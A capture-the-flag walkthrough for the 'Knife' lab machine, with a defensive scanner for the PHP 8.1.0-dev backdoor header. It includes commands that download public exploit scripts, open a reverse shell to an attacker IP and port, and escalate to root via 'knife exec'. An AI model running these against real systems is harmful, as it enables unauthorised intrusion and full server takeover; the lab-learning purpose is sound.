Walkthrough for Knife
As always, I started with an nmap scan.
The nmap output shows two open ports, 22 and 80. To enumerate further I installed Wappalyzer, a tool that gathers technical details about a website (the web server, frameworks and language versions it exposes).
To install this on Firefox:
Go to about:debugging#/runtime/this-firefox
Click 'Load Temporary Add-on'
Select src/drivers/webextension/manifest.json from the folder where Wappalyzer was downloaded.
Once installed it shows the message below,
If we click on the small icon on the right-hand side, it gives information about the technologies the site is using.
It's using PHP 8.1.0-dev, a development build that shipped with a backdoor. An attacker can execute arbitrary code on the server just by sending a crafted User-Agent header in a request. More information, and the interesting story behind this exploit, is written in the blog given below,
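A defender-side check, added here as an example (it is not from the original post or from the exploit repository): it parses raw HTTP requests and flags the header name that the PHP 8.1.0-dev backdoor listened on. The header name and marker string come from the public analysis of the backdoored commit; the sample requests and host name are constructed.

```python
# Added example (not from the original write-up): flag HTTP requests carrying the
# trigger header of the PHP 8.1.0-dev backdoor. That build looked for a header
# named "User-Agentt" (doubled "t") containing "zerodium"; no real client sends it.

TRIGGER_HEADER = "user-agentt"
TRIGGER_MARKER = "zerodium"


def parse_request(raw):
    """Split a raw HTTP/1.x request into its request line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # malformed header line: skip rather than crash the scanner
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify(raw):
    """Return 'trigger', 'suspicious' or 'clean' for one raw request."""
    _, headers = parse_request(raw)
    value = headers.get(TRIGGER_HEADER)
    if value is None:
        return "clean"
    # Any User-Agentt header is abnormal; the marker string is what actually
    # activated the backdoor, so rank requests that carry it higher.
    return "trigger" if TRIGGER_MARKER in value.lower() else "suspicious"


def scan(requests):
    """Return (request line, verdict) for every request that is not clean."""
    findings = []
    for raw in requests:
        verdict = classify(raw)
        if verdict != "clean":
            findings.append((parse_request(raw)[0], verdict))
    return findings


# Constructed sample traffic (not captured from the machine): a normal request,
# a probe using the odd header name, and one carrying the activation marker.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: curl/7.68.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: zerodium\r\n\r\n",
]
```

Run it against a request log or a reverse-proxy capture: a single "suspicious" hit is already worth an alert, because the header name itself never appears in legitimate traffic.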
Two scripts need to be downloaded to get a reverse shell from the exploit:
the POC script from this link,
and also the reverse shell exploit from here.
wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/backdoor_php_8.1.0-dev.py
wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
Now that both exploits are in your directory, run the reverse shell script with the target and your listener details:
python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
And we get a shell as the user!
The sudo -l command lists the sudo privileges of the current user.
The user is allowed to execute the knife command with root's privileges.
knife includes a collection of built in subcommands that work together to provide all of the functionality required to take specific actions against any object in an organization, including cookbooks, nodes, roles, data bags, environments, and users.
I tried to add / edit users and a few other things with the knife command. If there's a way to perform code execution with the knife command, then we can write a simple snippet to spawn a shell, which will run with root's privileges. The link https://docs.chef.io/workstation/knife_exec/ has good references for this: knife exec evaluates Ruby code passed on the command line.
knife exec -E 'RUBY CODE'
To execute a shell from Ruby, we'll pass exec "/bin/bash"; as the script (note the straight quotes; curly quotes from a copy-paste will break the command):
knife exec -E 'exec "/bin/bash";'
And grab the flag !
Skills and Lessons I learnt from this machine
I learnt to use the Wappalyzer tool, how to run publicly available exploits, and how to escalate privileges by abusing the functionality of a tool (knife) that is accessible to the user with sudo rights.
The lessons show why one should not run vulnerable software. The story behind the exploit is also a good example of why a secure version of TLS and a secure hashing algorithm should be used for storing passwords.